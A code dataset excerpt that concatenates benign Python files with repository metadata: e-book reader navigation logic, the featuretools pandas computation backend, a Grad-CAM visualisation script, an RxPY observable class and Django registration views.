self.__state["active_section"] = value
if self.document.has_toc_tree():
self.view.set_state_on_section_change(value)
reader_section_changed.send(self, active=value)
@property
def current_page(self) -> int:
return self.__state["current_page_index"]
@current_page.setter
def current_page(self, value: int):
if value == self.current_page:
return
if value not in self.document:
raise PaginationError(
f"Page {value} is out of range."
f"Total number of pages in the document is: {len(self.document)}"
)
self.__state["current_page_index"] = value
page = self.document[value]
if not self.document.is_single_page_document():
self.active_section = page.section
self.view.set_state_on_page_change(page)
# if config.conf["appearance"]["apply_text_styles"] and DC.TEXT_STYLE in self.document.capabilities:
# self.view.apply_text_styles(page.get_style_info())
reader_page_changed.send(self, current=page, prev=None)
def get_current_page_object(self) -> BasePage:
"""Return the current page."""
return self.document.get_page(self.current_page)
def go_to_page(self, page_number: int, pos: int = 0) -> bool:
self.current_page = page_number
self.view.set_insertion_point(pos)
def go_to_page_by_label(self, page_label):
try:
page = self.document.get_page_number_from_page_label(page_label)
self.go_to_page(page.index)
return True
except LookupError:
return False
def navigate(self, to: str, unit: str) -> bool:
"""
Navigate to `to` by unit `unit`.
Return `True` if navigation was successful, `False` otherwise.
If unit is page and the target is in another section, this method
returns False.
"""
assert to in ("next", "prev"), f"Invalid value {to} for arg`to`."
assert unit in ("page", "section"), f"Invalid value {unit} for arg`unit`."
if unit == "page":
step = 1 if to == "next" else -1
next_move = self.current_page + step
page = None if next_move not in self.document else self.document[next_move]
if page is not None:
if (to == "next" and not page.is_first_of_section) or (
to == "prev" and not page.is_last_of_section
):
self.current_page = next_move
return True
else:
return False
elif unit == "section":
this_section = self.active_section
target = "simple_next" if to == "next" else "simple_prev"
self.active_section = getattr(self.active_section, target)
if this_section.is_root and to == "next":
self.active_section = this_section.first_child
navigated = this_section is not self.active_section
if navigated:
self.go_to_first_of_section()
return navigated
def perform_wormhole_navigation(
self, *, page, start, end, last_position: tuple[int, int] = None
):
"""Jump to a certain location in the open document storing the current position in the navigation history."""
this_page = self.current_page
if last_position is None:
last_position = (self.view.get_insertion_point(), None)
if page is not None:
self.go_to_page(page)
self.view.go_to_position(start, end)
reading_position_change.send(self.view, position=start, tts_speech_prefix="")
self.push_navigation_stack(this_page, *last_position)
def go_to_next(self) -> bool:
"""Try to navigate to the next page."""
current = self.current_page
with suppress(PaginationError):
self.current_page = current + 1
return current != self.current_page
def go_to_prev(self) -> bool:
"""Try to navigate to the previous page."""
current = self.current_page
with suppress(PaginationError):
self.current_page = current - 1
return current != self.current_page
def go_to_first_of_section(self, section: Section = None):
section = section or self.active_section
self.current_page = section.pager.first
def go_to_last_of_section(self, section: Section = None):
section = section or self.active_section
self.current_page = section.pager.last
@property
def navigation_stack(self):
return self.__state.setdefault("navigation_stack", [])
def push_navigation_stack(self, last_page, last_pos_start, last_pos_end):
self.navigation_stack.append(
{
"last_page": last_page,
"source_range": (last_pos_start, last_pos_end),
}
)
def pop_navigation_stack(self):
try:
nav_stack_top = self.navigation_stack.pop()
except IndexError:
self.view.notify_invalid_action()
return
else:
if page_num := nav_stack_top.get("last_page"):
self.go_to_page(page_num)
start, end = nav_stack_top["source_range"]
self.view.go_to_position(start, end)
reading_position_change.send(
self.view, position=start, tts_speech_prefix=""
)
def handle_special_action_for_position(self, position: int) -> bool:
for link_range in self.iter_semantic_ranges_for_elements_of_type(
SemanticElementType.LINK
):
if position in link_range:
self.navigate_to_link_by_range(link_range)
@staticmethod
def _get_semantic_element_from_page(page, element_type, forward, anchor):
semantics = TextStructureMetadata(page.semantic_structure)
pos_getter = (
semantics.get_next_element_pos
if forward
else semantics.get_prev_element_pos
)
return pos_getter(element_type, anchor=anchor)
def get_semantic_element(self, element_type, forward, anchor):
return self._get_semantic_element_from_page(
self.get_current_page_object(), element_type, forward, anchor
)
def iter_semantic_ranges_for_elements_of_type(self, element_type):
semantics = TextStructureMetadata(
self.get_current_page_object().semantic_structure
)
yield from semantics.iter_ranges(element_type)
def navigate_to_link_by_range(self, link_range):
target_info = self.get_current_page_object().get_link_for_text_range(link_range)
if target_info is None:
log.warning(f"Could not resolve link target: {link_range=}")
return
elif target_info.is_external:
self.view.go_to_webpage(target_info.url)
else:
start, end = target_info.position
self.perform_wormhole_navigation(
page=target_info.page, start=start, end=None, last_position=link_range
)
def get_view_title(self, include_author=False):
if config.conf["general"]["show_file_name_as_title"]:
try:
document_path = self.document.get_file_system_path()
except DocumentIOError:
view_title = self.current_book.title
else:
filename = os.path.split(document_path)[-1]
view_title = os.path.splitext(filename)[0]
else:
view_title = self.current_book.title
if include_author and self.current_book.author:
author = self.current_book.author
# Translators: the title of the window when an e-book is open
view_title = _("{title} — by {author}").format(
title=view_title, author=author
)
return view_title + f" - {app.display_name}"
@staticmethod
def open_document_in_a_new_instance(uri):
run_subcommand_in_a_new_process(
[
"launcher",
uri.base64_encode(),
],
hidden=False,
)
| 35.706019 | 117 | 0.629303 |
4364b963d25110c23dcefd8b5f495021deec4b0e | 24,817 | py | Python | featuretools/computational_backends/pandas_backend.py | gaybro8777/featuretools | 575fced6a3de6ec4190dc12c7c65a13d20e1c804 | [
"BSD-3-Clause"
] | 1 | 2019-07-29T14:47:06.000Z | 2019-07-29T14:47:06.000Z | featuretools/computational_backends/pandas_backend.py | Anyz01/FeatureTools | 0bb7b29045107e10acfab07322ef00934ec21c14 | [
"BSD-3-Clause"
] | null | null | null | featuretools/computational_backends/pandas_backend.py | Anyz01/FeatureTools | 0bb7b29045107e10acfab07322ef00934ec21c14 | [
"BSD-3-Clause"
] | null | null | null | import cProfile
import os
import pstats
import sys
import warnings
from datetime import datetime
import numpy as np
import pandas as pd
import pandas.api.types as pdtypes
from .base_backend import ComputationalBackend
from .feature_tree import FeatureTree
from featuretools import variable_types
from featuretools.exceptions import UnknownFeature
from featuretools.feature_base import (
AggregationFeature,
DirectFeature,
IdentityFeature,
TransformFeature
)
from featuretools.utils.gen_utils import (
get_relationship_variable_id,
make_tqdm_iterator
)
warnings.simplefilter('ignore', np.RankWarning)
warnings.simplefilter("ignore", category=RuntimeWarning)
class PandasBackend(ComputationalBackend):
def __init__(self, entityset, features):
assert len(set(f.entity.id for f in features)) == 1, \
"Features must all be defined on the same entity"
self.entityset = entityset
self.target_eid = features[0].entity.id
self.features = features
self.feature_tree = FeatureTree(entityset, features)
def __sizeof__(self):
return self.entityset.__sizeof__()
def calculate_all_features(self, instance_ids, time_last,
training_window=None, profile=False,
precalculated_features=None, ignored=None,
verbose=False):
"""
Given a list of instance ids and features with a shared time window,
generate and return a mapping of instance -> feature values.
Args:
instance_ids (list): List of instance id for which to build features.
time_last (pd.Timestamp): Last allowed time. Data from exactly this
time not allowed.
training_window (Timedelta, optional): Data older than
time_last by more than this will be ignored.
profile (bool): Enable profiler if True.
verbose (bool): Print output progress if True.
Returns:
pd.DataFrame : Pandas DataFrame of calculated feature values.
Indexed by instance_ids. Columns in same order as features
passed in.
"""
assert len(instance_ids) > 0, "0 instance ids provided"
self.instance_ids = instance_ids
self.time_last = time_last
if self.time_last is None:
self.time_last = datetime.now()
# For debugging
if profile:
pr = cProfile.Profile()
pr.enable()
if precalculated_features is None:
precalculated_features = {}
# Access the index to get the filtered data we need
target_entity = self.entityset[self.target_eid]
if ignored:
# TODO: Just want to remove entities if don't have any (sub)features defined
# on them anymore, rather than recreating
ordered_entities = FeatureTree(self.entityset, self.features, ignored=ignored).ordered_entities
else:
ordered_entities = self.feature_tree.ordered_entities
necessary_columns = self.feature_tree.necessary_columns
eframes_by_filter = \
self.entityset.get_pandas_data_slice(filter_entity_ids=ordered_entities,
index_eid=self.target_eid,
instances=instance_ids,
entity_columns=necessary_columns,
time_last=time_last,
training_window=training_window,
verbose=verbose)
large_eframes_by_filter = None
if any([f.primitive.uses_full_entity for f in self.feature_tree.all_features if isinstance(f, TransformFeature)]):
large_necessary_columns = self.feature_tree.necessary_columns_for_all_values_features
large_eframes_by_filter = \
self.entityset.get_pandas_data_slice(filter_entity_ids=ordered_entities,
index_eid=self.target_eid,
instances=None,
entity_columns=large_necessary_columns,
time_last=time_last,
training_window=training_window,
verbose=verbose)
# Handle an empty time slice by returning a dataframe with defaults
if eframes_by_filter is None:
return self.generate_default_df(instance_ids=instance_ids)
finished_entity_ids = []
# Populate entity_frames with precalculated features
if len(precalculated_features) > 0:
for entity_id, precalc_feature_values in precalculated_features.items():
if entity_id in eframes_by_filter:
frame = eframes_by_filter[entity_id][entity_id]
eframes_by_filter[entity_id][entity_id] = pd.merge(frame,
precalc_feature_values,
left_index=True,
right_index=True)
else:
# Only features we're taking from this entity
# are precomputed
# Make sure the id variable is a column as well as an index
entity_id_var = self.entityset[entity_id].index
precalc_feature_values[entity_id_var] = precalc_feature_values.index.values
eframes_by_filter[entity_id] = {entity_id: precalc_feature_values}
finished_entity_ids.append(entity_id)
# Iterate over the top-level entities (filter entities) in sorted order
# and calculate all relevant features under each one.
if verbose:
total_groups_to_compute = sum(len(group)
for group in self.feature_tree.ordered_feature_groups.values())
pbar = make_tqdm_iterator(total=total_groups_to_compute,
desc="Computing features",
unit="feature group")
if verbose:
pbar.update(0)
for filter_eid in ordered_entities:
entity_frames = eframes_by_filter[filter_eid]
large_entity_frames = None
if large_eframes_by_filter is not None:
large_entity_frames = large_eframes_by_filter[filter_eid]
# update the current set of entity frames with the computed features
# from previously finished entities
for eid in finished_entity_ids:
# only include this frame if it's not from a descendent entity:
# descendent entity frames will have to be re-calculated.
# TODO: this check might not be necessary, depending on our
# constraints
if not self.entityset.find_backward_path(start_entity_id=filter_eid,
goal_entity_id=eid):
entity_frames[eid] = eframes_by_filter[eid][eid]
# TODO: look this over again
# precalculated features will only be placed in entity_frames,
# and it's possible that that they are the only features computed
# for an entity. In this case, the entity won't be present in
# large_eframes_by_filter. The relevant lines that this case passes
# through are 136-143
if (large_eframes_by_filter is not None and
eid in large_eframes_by_filter and eid in large_eframes_by_filter[eid]):
large_entity_frames[eid] = large_eframes_by_filter[eid][eid]
if filter_eid in self.feature_tree.ordered_feature_groups:
for group in self.feature_tree.ordered_feature_groups[filter_eid]:
if verbose:
pbar.set_postfix({'running': 0})
test_feature = group[0]
entity_id = test_feature.entity.id
input_frames_type = self.feature_tree.input_frames_type(test_feature)
input_frames = large_entity_frames
if input_frames_type == "subset_entity_frames":
input_frames = entity_frames
handler = self._feature_type_handler(test_feature)
result_frame = handler(group, input_frames)
output_frames_type = self.feature_tree.output_frames_type(test_feature)
if output_frames_type in ['full_and_subset_entity_frames', 'subset_entity_frames']:
index = entity_frames[entity_id].index
# If result_frame came from a uses_full_entity feature,
# and the input was large_entity_frames,
# then it's possible it doesn't contain some of the features
# in the output entity_frames
# We thus need to concatenate the existing frame with the result frame,
# making sure not to duplicate any columns
_result_frame = result_frame.reindex(index)
cols_to_keep = [c for c in _result_frame.columns
if c not in entity_frames[entity_id].columns]
entity_frames[entity_id] = pd.concat([entity_frames[entity_id],
_result_frame[cols_to_keep]],
axis=1)
if output_frames_type in ['full_and_subset_entity_frames', 'full_entity_frames']:
index = large_entity_frames[entity_id].index
_result_frame = result_frame.reindex(index)
cols_to_keep = [c for c in _result_frame.columns
if c not in large_entity_frames[entity_id].columns]
large_entity_frames[entity_id] = pd.concat([large_entity_frames[entity_id],
_result_frame[cols_to_keep]],
axis=1)
if verbose:
pbar.update(1)
finished_entity_ids.append(filter_eid)
if verbose:
pbar.set_postfix({'running': 0})
pbar.refresh()
sys.stdout.flush()
pbar.close()
# debugging
if profile:
pr.disable()
ROOT_DIR = os.path.expanduser("~")
prof_folder_path = os.path.join(ROOT_DIR, 'prof')
if not os.path.exists(prof_folder_path):
os.mkdir(prof_folder_path)
with open(os.path.join(prof_folder_path, 'inst-%s.log' %
list(instance_ids)[0]), 'w') as f:
pstats.Stats(pr, stream=f).strip_dirs().sort_stats("cumulative", "tottime").print_stats()
df = eframes_by_filter[self.target_eid][self.target_eid]
# fill in empty rows with default values
missing_ids = [i for i in instance_ids if i not in
df[target_entity.index]]
if missing_ids:
default_df = self.generate_default_df(instance_ids=missing_ids,
extra_columns=df.columns)
df = df.append(default_df, sort=True)
df.index.name = self.entityset[self.target_eid].index
column_list = []
for feat in self.features:
column_list.extend(feat.get_feature_names())
return df[column_list]
def generate_default_df(self, instance_ids, extra_columns=None):
index_name = self.features[0].entity.index
default_row = []
default_cols = []
for f in self.features:
for name in f.get_feature_names():
default_cols.append(name)
default_row.append(f.default_value)
default_matrix = [default_row] * len(instance_ids)
default_df = pd.DataFrame(default_matrix,
columns=default_cols,
index=instance_ids)
default_df.index.name = index_name
if extra_columns is not None:
for c in extra_columns:
if c not in default_df.columns:
default_df[c] = [np.nan] * len(instance_ids)
return default_df
def _feature_type_handler(self, f):
if isinstance(f, TransformFeature):
return self._calculate_transform_features
elif isinstance(f, DirectFeature):
return self._calculate_direct_features
elif isinstance(f, AggregationFeature):
return self._calculate_agg_features
elif isinstance(f, IdentityFeature):
return self._calculate_identity_features
else:
raise UnknownFeature(u"{} feature unknown".format(f.__class__))
def _calculate_identity_features(self, features, entity_frames):
entity_id = features[0].entity.id
assert (entity_id in entity_frames and
features[0].get_name() in entity_frames[entity_id].columns)
return entity_frames[entity_id]
def _calculate_transform_features(self, features, entity_frames):
entity_id = features[0].entity.id
assert len(set([f.entity.id for f in features])) == 1, \
"features must share base entity"
assert entity_id in entity_frames
frame = entity_frames[entity_id]
for f in features:
# handle when no data
if frame.shape[0] == 0:
set_default_column(frame, f)
continue
# collect only the variables we need for this transformation
variable_data = [frame[bf.get_name()].values
for bf in f.base_features]
feature_func = f.get_function()
# apply the function to the relevant dataframe slice and add the
# feature row to the results dataframe.
if f.primitive.uses_calc_time:
values = feature_func(*variable_data, time=self.time_last)
else:
values = feature_func(*variable_data)
# if we don't get just the values, the assignment breaks when indexes don't match
def strip_values_if_series(values):
if isinstance(values, pd.Series):
values = values.values
return values
if f.number_output_features > 1:
values = [strip_values_if_series(value) for value in values]
else:
values = [strip_values_if_series(values)]
update_feature_columns(f, frame, values)
return frame
def _calculate_direct_features(self, features, entity_frames):
entity_id = features[0].entity.id
parent_entity_id = features[0].parent_entity.id
assert entity_id in entity_frames and parent_entity_id in entity_frames
path = self.entityset.find_forward_path(entity_id, parent_entity_id)
assert len(path) == 1, \
"Error calculating DirectFeatures, len(path) > 1"
parent_df = entity_frames[parent_entity_id]
child_df = entity_frames[entity_id]
merge_var = path[0].child_variable.id
# generate a mapping of old column names (in the parent entity) to
# new column names (in the child entity) for the merge
col_map = {path[0].parent_variable.id: merge_var}
index_as_feature = None
for f in features:
if f.base_features[0].get_name() == path[0].parent_variable.id:
index_as_feature = f
# Sometimes entityset._add_multigenerational_links adds link variables
# that would ordinarily get calculated as direct features,
# so we make sure not to attempt to calculate again
base_names = f.base_features[0].get_feature_names()
for name, base_name in zip(f.get_feature_names(), base_names):
if name in child_df.columns:
continue
col_map[base_name] = name
# merge the identity feature from the parent entity into the child
merge_df = parent_df[list(col_map.keys())].rename(columns=col_map)
if index_as_feature is not None:
merge_df.set_index(index_as_feature.get_name(), inplace=True,
drop=False)
else:
merge_df.set_index(merge_var, inplace=True)
new_df = pd.merge(left=child_df, right=merge_df,
left_on=merge_var, right_index=True,
how='left')
return new_df
def _calculate_agg_features(self, features, entity_frames):
test_feature = features[0]
entity = test_feature.entity
child_entity = test_feature.base_features[0].entity
assert entity.id in entity_frames and child_entity.id in entity_frames
frame = entity_frames[entity.id]
base_frame = entity_frames[child_entity.id]
# Sometimes approximate features get computed in a previous filter frame
# and put in the current one dynamically,
# so there may be existing features here
features = [f for f in features if f.get_name()
not in frame.columns]
if not len(features):
return frame
# handle where
where = test_feature.where
if where is not None and not base_frame.empty:
base_frame = base_frame.loc[base_frame[where.get_name()]]
# when no child data, just add all the features to frame with nan
if base_frame.empty:
for f in features:
frame[f.get_name()] = np.nan
else:
relationship_path = self.entityset.find_backward_path(entity.id,
child_entity.id)
groupby_var = get_relationship_variable_id(relationship_path)
# if the use_previous property exists on this feature, include only the
# instances from the child entity included in that Timedelta
use_previous = test_feature.use_previous
if use_previous and not base_frame.empty:
# Filter by use_previous values
time_last = self.time_last
if use_previous.is_absolute():
time_first = time_last - use_previous
ti = child_entity.time_index
if ti is not None:
base_frame = base_frame[base_frame[ti] >= time_first]
else:
n = use_previous.value
def last_n(df):
return df.iloc[-n:]
base_frame = base_frame.groupby(groupby_var, observed=True, sort=False).apply(last_n)
to_agg = {}
agg_rename = {}
to_apply = set()
# apply multivariable and time-dependent features as we find them, and
# save aggregable features for later
for f in features:
if _can_agg(f):
variable_id = f.base_features[0].get_name()
if variable_id not in to_agg:
to_agg[variable_id] = []
func = f.get_function()
funcname = func
if callable(func):
# make sure func has a unique name due to how pandas names aggregations
func.__name__ = f.primitive.name
funcname = f.primitive.name
to_agg[variable_id].append(func)
# this is used below to rename columns that pandas names for us
agg_rename[u"{}-{}".format(variable_id, funcname)] = f.get_name()
continue
to_apply.add(f)
# Apply the non-aggregable functions generate a new dataframe, and merge
# it with the existing one
if len(to_apply):
wrap = agg_wrapper(to_apply, self.time_last)
# groupby_var can be both the name of the index and a column,
# to silence pandas warning about ambiguity we explicitly pass
# the column (in actuality grouping by both index and group would
# work)
to_merge = base_frame.groupby(base_frame[groupby_var], observed=True, sort=False).apply(wrap)
frame = pd.merge(left=frame, right=to_merge,
left_index=True,
right_index=True, how='left')
# Apply the aggregate functions to generate a new dataframe, and merge
# it with the existing one
if len(to_agg):
# groupby_var can be both the name of the index and a column,
# to silence pandas warning about ambiguity we explicitly pass
# the column (in actuality grouping by both index and group would
# work)
to_merge = base_frame.groupby(base_frame[groupby_var],
observed=True, sort=False).agg(to_agg)
# rename columns to the correct feature names
to_merge.columns = [agg_rename["-".join(x)] for x in to_merge.columns.ravel()]
to_merge = to_merge[list(agg_rename.values())]
# workaround for pandas bug where categories are in the wrong order
# see: https://github.com/pandas-dev/pandas/issues/22501
if pdtypes.is_categorical_dtype(frame.index):
categories = pdtypes.CategoricalDtype(categories=frame.index.categories)
to_merge.index = to_merge.index.astype(object).astype(categories)
frame = pd.merge(left=frame, right=to_merge,
left_index=True, right_index=True, how='left')
# Handle default values
fillna_dict = {}
for f in features:
feature_defaults = {name: f.default_value
for name in f.get_feature_names()}
fillna_dict.update(feature_defaults)
frame.fillna(fillna_dict, inplace=True)
# convert boolean dtypes to floats as appropriate
# pandas behavior: https://github.com/pydata/pandas/issues/3752
for f in features:
if (f.number_output_features == 1 and
f.variable_type == variable_types.Numeric and
frame[f.get_name()].dtype.name in ['object', 'bool']):
frame[f.get_name()] = frame[f.get_name()].astype(float)
return frame
def _can_agg(feature):
assert isinstance(feature, AggregationFeature)
base_features = feature.base_features
if feature.where is not None:
base_features = [bf.get_name() for bf in base_features
if bf.get_name() != feature.where.get_name()]
if feature.primitive.uses_calc_time:
return False
single_output = feature.primitive.number_output_features == 1
return len(base_features) == 1 and single_output
def agg_wrapper(feats, time_last):
def wrap(df):
d = {}
for f in feats:
func = f.get_function()
variable_ids = [bf.get_name() for bf in f.base_features]
args = [df[v] for v in variable_ids]
if f.primitive.uses_calc_time:
values = func(*args, time=time_last)
else:
values = func(*args)
if f.number_output_features == 1:
values = [values]
update_feature_columns(f, d, values)
return pd.Series(d)
return wrap
def set_default_column(frame, f):
for name in f.get_feature_names():
frame[name] = f.default_value
def update_feature_columns(feature, data, values):
names = feature.get_feature_names()
assert len(names) == len(values)
for name, value in zip(names, values):
data[name] = value
| 44.715315 | 122 | 0.576218 |
f10a60a12a95651771558eba8bd95b1e3e915974 | 8,497 | py | Python | scripts/legacy/gradcam.py | rhong3/pancan_imaging | 969006a13e2fc2cbc05b695d48c8c45c30089704 | [
"MIT"
] | null | null | null | scripts/legacy/gradcam.py | rhong3/pancan_imaging | 969006a13e2fc2cbc05b695d48c8c45c30089704 | [
"MIT"
] | null | null | null | scripts/legacy/gradcam.py | rhong3/pancan_imaging | 969006a13e2fc2cbc05b695d48c8c45c30089704 | [
"MIT"
] | null | null | null | import argparse
import cv2
import numpy as np
import torch
from torch.autograd import Function
from torchvision import models
import torch.nn.functional as F
import matplotlib.pyplot as plt
class GuidedBackpropReLU(Function):
@staticmethod
def forward(self, input):
positive_mask = (input > 0).type_as(input)
output = torch.addcmul(torch.zeros(input.size()).type_as(input), input, positive_mask)
self.save_for_backward(input, output)
return output
@staticmethod
def backward(self, grad_output):
input, output = self.saved_tensors
grad_input = None
positive_mask_1 = (input > 0).type_as(grad_output)
positive_mask_2 = (grad_output > 0).type_as(grad_output)
grad_input = torch.addcmul(torch.zeros(input.size()).type_as(input),
torch.addcmul(torch.zeros(input.size()).type_as(input), grad_output,
positive_mask_1), positive_mask_2)
return grad_input
class GuidedBackpropReLUModel:
def __init__(self, model, use_cuda):
self.model = model
self.model.eval()
self.cuda = use_cuda
if self.cuda:
self.model = model.cuda()
def recursive_relu_apply(module_top):
for idx, module in module_top._modules.items():
recursive_relu_apply(module)
if module.__class__.__name__ == 'ReLU':
module_top._modules[idx] = GuidedBackpropReLU.apply
# replace ReLU with GuidedBackpropReLU
recursive_relu_apply(self.model)
def forward(self, input):
return self.model(input)
def __call__(self, input, index=None):
if self.cuda:
output = self.forward(input.cuda())
else:
output = self.forward(input)
if index == None:
index = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][index] = 1
one_hot = torch.from_numpy(one_hot).requires_grad_(True)
if self.cuda:
one_hot = torch.sum(one_hot.cuda() * output)
else:
one_hot = torch.sum(one_hot * output)
# self.model.features.zero_grad()
# self.model.last_linear.zero_grad()
one_hot.backward(retain_graph=True)
output = input.grad.cpu().data.numpy()
output = output[0, :, :, :]
return output
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--use-cuda', action='store_true', default=False,
help='Use NVIDIA GPU acceleration')
parser.add_argument('--image-path', type=str, default='./examples/both.png',
help='Input image path')
args = parser.parse_args()
args.use_cuda = args.use_cuda and torch.cuda.is_available()
if args.use_cuda:
print("Using GPU for acceleration")
else:
print("Using CPU for computation")
return args
def deprocess_image(img):
""" see https://github.com/jacobgil/keras-grad-cam/blob/master/grad-cam.py#L65 """
img = img - np.mean(img)
img = img / (np.std(img) + 1e-5)
img = img * 0.1
img = img + 0.5
img = np.clip(img, 0, 1)
return np.uint8(img*255)
def show_cam_on_image(img, mask):
heatmap = cv2.applyColorMap(np.uint8(255 * (1-mask)), cv2.COLORMAP_JET)
heatmap = np.float32(heatmap) / 255
cam = heatmap + np.float32(img)
cam = cam / np.max(cam)
return (np.uint8(255 * cam))
class GradCam:
def __init__(self, model, feature_module, target_layer_names, use_cuda):
self.model = model
self.feature_module = feature_module
self.model.eval()
self.cuda = use_cuda
if self.cuda:
self.model = model.cuda()
self.extractor = ModelOutputs(self.model, self.feature_module, target_layer_names)
def forward(self, input):
return self.model(input)
def __call__(self, input, index=None):
if self.cuda:
features, output = self.extractor(input.cuda())
else:
features, output = self.extractor(input)
if index == None:
index = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][index] = 1
one_hot = torch.from_numpy(one_hot).requires_grad_(True)
if self.cuda:
one_hot = torch.sum(one_hot.cuda() * output)
else:
one_hot = torch.sum(one_hot * output)
self.feature_module.zero_grad()
self.model.zero_grad()
one_hot.backward(retain_graph=True)
grads_val = self.extractor.get_gradients()[-1].cpu().data.numpy()
target = features[-1]
target = target.cpu().data.numpy()[0, :]
weights = np.mean(grads_val, axis=(2, 3))[0, :]
cam = np.zeros(target.shape[1:], dtype=np.float32)
for i, w in enumerate(weights):
cam += w * target[i, :, :]
cam = np.maximum(cam, 0)
cam = cv2.resize(cam, input.shape[2:])
cam = cam - np.min(cam)
cam = cam / np.max(cam)
return cam
class FeatureExtractor():
""" Class for extracting activations and
registering gradients from targetted intermediate layers """
def __init__(self, model, target_layers):
self.model = model
self.target_layers = target_layers
self.gradients = []
def save_gradient(self, grad):
self.gradients.append(grad)
def __call__(self, x):
outputs = []
self.gradients = []
for name, module in self.model._modules.items():
x = module(x)
if name in self.target_layers:
x.register_hook(self.save_gradient)
outputs += [x]
return outputs, x
class ModelOutputs():
""" Class for making a forward pass, and getting:
1. The network output.
2. Activations from intermeddiate targetted layers.
3. Gradients from intermeddiate targetted layers. """
def __init__(self, model, feature_module, target_layers):
self.model = model
self.feature_module = feature_module
self.feature_extractor = FeatureExtractor(self.feature_module, target_layers)
def get_gradients(self):
return self.feature_extractor.gradients
def __call__(self, x):
target_activations = []
for name, module in self.model._modules.items():
if module == self.feature_module:
target_activations, x = self.feature_extractor(x)
adaptiveAvgPoolWidth = x.shape[2]
x = F.avg_pool2d(x, kernel_size=adaptiveAvgPoolWidth)
x = x.view(x.size(0), -1)
elif "avgpool" in name.lower():
x = module(x)
x = x.view(x.size(0), -1)
else:
x = module(x)
return target_activations, x
# if __name__ == '__main__':
# """ python grad_cam.py <path_to_image>
# 1. Loads an image with opencv.
# 2. Preprocesses it for VGG19 and converts to a pytorch variable.
# 3. Makes a forward pass to find the category index with the highest score,
# and computes intermediate activations.
# Makes the visualization. """
# args = get_args()
# # Can work with any model, but it assumes that the model has a
# # feature method, and a classifier method,
# # as in the VGG models in torchvision.
# model = models.resnet50(pretrained=True)
# grad_cam = GradCam(model=model, feature_module=model.layer4, \
# target_layer_names=["2"], use_cuda=args.use_cuda)
# img = cv2.imread(args.image_path, 1)
# img = np.float32(cv2.resize(img, (224, 224))) / 255
# input = preprocess_image(img)
# # If None, returns the map for the highest scoring category.
# # Otherwise, targets the requested index.
# target_index = None
# mask = grad_cam(input, target_index)
# show_cam_on_image(img, mask)
# gb_model = GuidedBackpropReLUModel(model=model, use_cuda=args.use_cuda)
# print(model._modules.items())
# gb = gb_model(input, index=target_index)
# gb = gb.transpose((1, 2, 0))
# cam_mask = cv2.merge([mask, mask, mask])
# cam_gb = deprocess_image(cam_mask*gb)
# gb = deprocess_image(gb)
# cv2.imwrite('gb.jpg', gb)
# cv2.imwrite('cam_gb.jpg', cam_gb) | 33.321569 | 103 | 0.610098 |
85d20d8ca73e63ebdcfe0f384c485daf798c6864 | 672 | py | Python | rx/linq/groupedobservable.py | AlexMost/RxPY | 05cb14c72806dc41e243789c05f498dede11cebd | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | rx/linq/groupedobservable.py | AlexMost/RxPY | 05cb14c72806dc41e243789c05f498dede11cebd | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | rx/linq/groupedobservable.py | AlexMost/RxPY | 05cb14c72806dc41e243789c05f498dede11cebd | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-11-04T11:13:49.000Z | 2021-11-04T11:13:49.000Z | from rx import AnonymousObservable, Observable
from rx.disposables import CompositeDisposable
class GroupedObservable(Observable):
def __init__(self, key, underlying_observable, merged_disposable=None):
super(GroupedObservable, self).__init__(self._subscribe)
self.key = key
def subscribe(observer):
return CompositeDisposable(merged_disposable.disposable, underlying_observable.subscribe(observer))
self.underlying_observable = underlying_observable if not merged_disposable else AnonymousObservable(subscribe)
def _subscribe(self, observer):
return self.underlying_observable.subscribe(observer)
| 37.333333 | 119 | 0.767857 |
9afd733ea63952e83599722592308f117a834d6b | 1,793 | py | Python | StudArt/authentication/views.py | YuriyLisovskiy/OOA_Team_X-A | f8a977f5f498e33c69df1ed503d1e44d5f5b99a5 | [
"MIT"
] | null | null | null | StudArt/authentication/views.py | YuriyLisovskiy/OOA_Team_X-A | f8a977f5f498e33c69df1ed503d1e44d5f5b99a5 | [
"MIT"
] | 10 | 2020-11-06T08:37:02.000Z | 2020-12-09T23:08:25.000Z | StudArt/authentication/views.py | YuriyLisovskiy/OOA_Team_X-A | f8a977f5f498e33c69df1ed503d1e44d5f5b99a5 | [
"MIT"
] | 1 | 2021-09-16T10:56:02.000Z | 2021-09-16T10:56:02.000Z | from django.db.models import Q
from rest_framework import generics, permissions
from rest_framework.response import Response
from authentication.serializers import RegisterUserSerializer
from core.models import UserModel
# /api/v1/auth/register
# methods:
# - post:
# - username: string
# - email: string
# - password: string
# returns (in case of success):
# {
# "id": <int>,
# "username": <string>,
# "email": <string>,
# "first_name": <string>,
# "last_name": <string>,
# "avatar": <string (avatar full link)>,
# "is_superuser": <bool>,
# "rating": <float>,
# "token": <string (JWT token)>
# }
class RegisterUserAPIView(generics.CreateAPIView):
permission_classes = (permissions.AllowAny,)
queryset = UserModel.objects.all()
serializer_class = RegisterUserSerializer
# /api/v1/auth/user/exists
# methods:
# - get (at least one field is required):
# - username: string (optional)
# - email: string (optional)
# returns in case of success (else 400):
# {
# "exists": <bool>,
# "message": <string>
# }
class UserExistsAPIView(generics.RetrieveAPIView):
permission_classes = (permissions.AllowAny,)
def get(self, request, *args, **kwargs):
q = None
username = request.GET.get('username', None)
if username:
q = Q(username=username)
email = request.GET.get('email', None)
if email:
email_q = Q(email=email)
if q:
q |= email_q
else:
q = email_q
if not q:
return Response(status=400)
exists = UserModel.objects.filter(q).exists()
data = {
'exists': exists
}
if exists:
data['message'] = 'User with this username and(or) email address already exists'
else:
data['message'] = 'User does not exist'
return Response(data)
| 24.561644 | 83 | 0.645845 |
f6dcc7e8ebb20940a9bf8adb90460dbb63d69373 | 4,168 | py | Python | skywire-xns.py | devzone777/skywire-xns | dea50f53a5936c9bd3a28f28b1da38f3f5c70220 | [
"BSD-3-Clause"
] | null | null | null | skywire-xns.py | devzone777/skywire-xns | dea50f53a5936c9bd3a28f28b1da38f3f5c70220 | [
"BSD-3-Clause"
] | null | null | null | skywire-xns.py | devzone777/skywire-xns | dea50f53a5936c9bd3a28f28b1da38f3f5c70220 | [
"BSD-3-Clause"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
################################################################################
#
#
# Program:
